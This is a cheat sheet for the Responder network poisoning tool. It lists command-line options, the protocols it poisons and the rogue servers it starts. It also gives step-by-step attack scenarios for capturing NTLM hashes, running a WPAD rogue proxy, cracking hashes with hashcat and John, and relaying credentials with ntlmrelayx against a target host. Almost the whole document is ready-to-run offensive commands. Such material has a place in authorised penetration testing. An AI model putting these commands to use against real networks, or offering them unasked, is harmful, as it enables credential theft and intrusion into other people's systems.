Responder Cheatsheet
LLMNR, NBT-NS, and MDNS poisoner for capturing credentials.
Basic Syntax
sudo responder -I <interface> [options]
Core Options
| Option | Description |
|---|---|
-I INTERFACE | Network interface (required) |
-i IP | Local IP to use |
-e IP | External IP for WPAD |
-b | Return basic HTTP auth |
-r | Enable answers for netbios wredir suffix queries |
-d | Enable answers for netbios domain suffix queries |
-w | Start WPAD rogue proxy server |
-F | Force WPAD auth on wpad.dat file retrieval |
-P | Force proxy auth (may cause DOS) |
-v | Verbose mode |
-A | Analyze mode (no poisoning) |
Basic Usage
Start Responder
sudo responder -I eth0
With WPAD Proxy
sudo responder -I eth0 -wFP
Analyze Mode (Passive)
sudo responder -I eth0 -A
Force Basic Auth
sudo responder -I eth0 -b
Protocols Poisoned
| Protocol | Description |
|---|---|
| LLMNR | Link-Local Multicast Name Resolution |
| NBT-NS | NetBIOS Name Service |
| MDNS | Multicast DNS |
Servers Started
| Server | Purpose |
|---|---|
| HTTP | Capture HTTP auth |
| HTTPS | Capture HTTPS auth |
| SMB | Capture SMB auth (NTLMv1/v2) |
| LDAP | Capture LDAP auth |
| SQL | Capture MSSQL auth |
| FTP | Capture FTP credentials |
| POP3 | Capture POP3 credentials |
| IMAP | Capture IMAP credentials |
| SMTP | Capture SMTP credentials |
| DNS | Respond to DNS queries |
| Kerberos | Capture Kerberos auth |
| WPAD | Web Proxy Auto-Discovery |
| WinRM | Windows Remote Management |
| RDP | Remote Desktop Protocol |
| DCE-RPC | Capture RPC auth |
Configuration
Config File Location
/etc/responder/Responder.conf
or
/usr/share/responder/Responder.conf
Disable Specific Servers
Edit config file:
[Responder Core]
SQL = Off
SMB = On
HTTP = On
HTTPS = On
Captured Hashes
Hash Location
/usr/share/responder/logs/
Hash Format (NTLMv2)
user::DOMAIN:challenge:response:blob
Crack with Hashcat
hashcat -m 5600 hashes.txt wordlist.txt
Crack with John
john --format=netntlmv2 hashes.txt --wordlist=wordlist.txt
Attack Scenarios
Credential Capture
- Run Responder:
sudo responder -I eth0 - Wait for victim to mistype share name or query non-existent host
- Responder poisons response
- Victim sends credentials to attacker
- Capture NTLMv1/v2 hash
WPAD Attack
- Run Responder with WPAD:
sudo responder -I eth0 -wFP - Victim’s browser requests wpad.dat
- Responder forces authentication
- Capture credentials
Combine with NTLM Relay
Disable SMB/HTTP in Responder
Edit Responder.conf:
SMB = Off
HTTP = Off
Run Responder
sudo responder -I eth0
Run ntlmrelayx
impacket-ntlmrelayx -t smb://10.10.10.10 -smb2support
Best Practices
- Run in analyze mode first (
-A) to understand traffic - Be aware of potential network disruption
- Use with ntlmrelayx for relay attacks instead of just capturing
- Check if SMB signing is disabled on targets
Troubleshooting
| Issue | Solution |
|---|---|
| Port 445 in use | Disable local SMB: systemctl stop smbd |
| No captures | Check interface and network segment |
| Hash not cracking | May need better wordlist or rules |